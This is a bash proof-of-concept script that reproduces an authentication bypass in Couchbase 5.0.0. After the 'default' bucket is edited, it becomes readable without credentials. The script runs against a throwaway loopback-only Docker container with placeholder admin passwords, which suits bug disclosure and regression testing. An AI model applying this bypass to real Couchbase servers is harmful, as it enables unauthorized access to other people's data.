Couchbase 5.0.0 "edit-to-free" Security Bug
#!/bin/bash
#
# Couchbase 5.0.0 "edit-to-free" Security Bug
# ===========================================
#
# Couchbase 5 introduced RBAC, so clients must always authenticate to
# access any bucket. But in the case of the 'default' bucket, once the
# bucket has been edited, clients can access it without authentication.
#
# Heungsub Lee <[email protected]>
#
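# Abort on any failed command, unset variable or failed pipeline stage, so a
# partially initialised cluster never reaches the probe steps below.
set -euo pipefail

# Name of the bucket under test. Only 'default' shows the behaviour this
# script reproduces; the value is interpolated into the Python probes below
# and is never reassigned, hence readonly.
readonly CB_BUCKET='default'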
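# Remove the test container on every exit path (normal end, 'set -e' abort,
# signal), so a throwaway instance holding an authentication-free bucket is
# not left running. Cleanup is best-effort: a failed 'docker rm' must not
# replace the script's own exit status, which is the reproduction signal.
finalize() {
  docker rm -f cb5 || true
}
# Install the trap before the container exists, so that a failure in
# 'docker run' itself (or in any later step) still triggers cleanup.
# NOTE: a pre-existing container named 'cb5' makes 'docker run' fail and is
# then removed by the trap.
trap finalize EXIT

# Start Couchbase 5.0.0 Enterprise. Ports are bound to the loopback
# interface only: the script connects via 127.0.0.1 (see the couchbase://
# URLs below), and a bucket that this reproduction deliberately leaves
# reachable without authentication should not be exposed to the network.
docker run -d --name=cb5 \
  -p 127.0.0.1:8091-8094:8091-8094 \
  -p 127.0.0.1:11210:11210 \
  couchbase:enterprise-5.0.0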
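# Give the server time to come up before driving couchbase-cli against it.
# This is a fixed delay, not a readiness probe; override it through
# CB_WAIT_SECONDS (default 10) on slower hosts.
sleep "${CB_WAIT_SECONDS:-10}"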
# Initialise a single-node cluster inside the container. Every couchbase-cli
# invocation runs via 'docker exec' against the node's own REST port.
cb_cli=(docker exec cb5 /opt/couchbase/bin/couchbase-cli)

# Data and index paths must exist and belong to the 'couchbase' user before
# they are handed to node-init.
docker exec cb5 mkdir -p /data/data /data/index
docker exec cb5 chown couchbase /data/data /data/index

# NOTE(review): the password passed here ('password') differs from the
# cluster password set by cluster-init below; it appears to be a placeholder
# the node accepts before any administrator exists — confirm against the
# couchbase-cli 5.0 docs.
"${cb_cli[@]}" node-init \
  --cluster='127.0.0.1:8091' \
  --user='Administrator' \
  --password='password' \
  --node-init-data-path='/data/data' \
  --node-init-index-path='/data/index'

# Create the cluster with the data, index and query services. The fixed
# administrator password is only used for this throwaway container.
"${cb_cli[@]}" cluster-init \
  --cluster='127.0.0.1:8091' \
  --cluster-username='Administrator' \
  --cluster-password='PaSsWoRd' \
  --cluster-port='8091' \
  --cluster-ramsize='512' \
  --cluster-index-ramsize='256' \
  --cluster-fts-ramsize='256' \
  --index-storage-setting='default' \
  --services='data,index,query'

# Name the cluster; from here on the cluster credentials are required.
"${cb_cli[@]}" setting-cluster \
  --cluster='127.0.0.1:8091' \
  --user='Administrator' \
  --password='PaSsWoRd' \
  --cluster-name='test'
# Create the bucket under test: an unreplicated couchbase-type bucket with
# ramsize 512, full eviction and flush enabled. '--wait' is passed so the
# command does not return before the bucket is usable — presumably what
# keeps step 1 from racing bucket creation; confirm against the CLI docs.
bucket_opts=(
  --cluster='127.0.0.1:8091'
  --user='Administrator'
  --password='PaSsWoRd'
  --bucket="$CB_BUCKET"
  --bucket-ramsize='512'
  --bucket-replica='0'
  --bucket-type='couchbase'
  --bucket-priority='high'
  --bucket-eviction-policy='fullEviction'
  --enable-flush='1'
  --enable-index-replica='0'
  --conflict-resolution='sequence'
  --wait
)
docker exec cb5 /opt/couchbase/bin/couchbase-cli bucket-create "${bucket_opts[@]}"
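# 1. Baseline: with RBAC in place, a freshly created 'default' bucket must
#    reject an unauthenticated connection, so this probe is *expected* to
#    fail. If it succeeds, the bucket was already open before any edit and
#    step 3 would prove nothing; stop with a distinct exit status instead of
#    letting the script report a false positive.
echo
echo '========================================================================'
echo ' 1. not possible to get bucket without auth'
echo '========================================================================'
if python <<EOF; then
from couchbase.bucket import Bucket
print(Bucket('couchbase://127.0.0.1/$CB_BUCKET'))
EOF
  printf 'precondition failed: bucket %s was reachable without auth before the edit\n' "$CB_BUCKET" >&2
  exit 2
fi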
# 2. Edit the bucket without changing any of its settings. Per the header
#    comment, a single edit of the 'default' bucket is what moves it into
#    the authentication-free state that step 3 probes.
echo
echo '========================================================================'
echo ' 2. edit bucket'
echo '========================================================================'
admin_auth=(--cluster='127.0.0.1:8091' --user='Administrator' --password='PaSsWoRd')
docker exec cb5 /opt/couchbase/bin/couchbase-cli bucket-edit \
  "${admin_auth[@]}" \
  --bucket="$CB_BUCKET"
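# 3. Repeat the unauthenticated probe after the edit. 'set -e' would already
#    abort on a failing probe, but the outcome is made explicit: exit 0 means
#    the bug reproduced (bucket opened without credentials), exit 1 means it
#    did not.
echo
echo '========================================================================'
echo ' 3. now we can get bucket without auth'
echo '========================================================================'
if ! python <<EOF; then
from couchbase.bucket import Bucket
print(Bucket('couchbase://127.0.0.1/$CB_BUCKET'))
EOF
  printf 'not reproduced: bucket %s still requires auth after the edit\n' "$CB_BUCKET" >&2
  exit 1
fi
printf 'reproduced: bucket %s is reachable without auth after the edit\n' "$CB_BUCKET" >&2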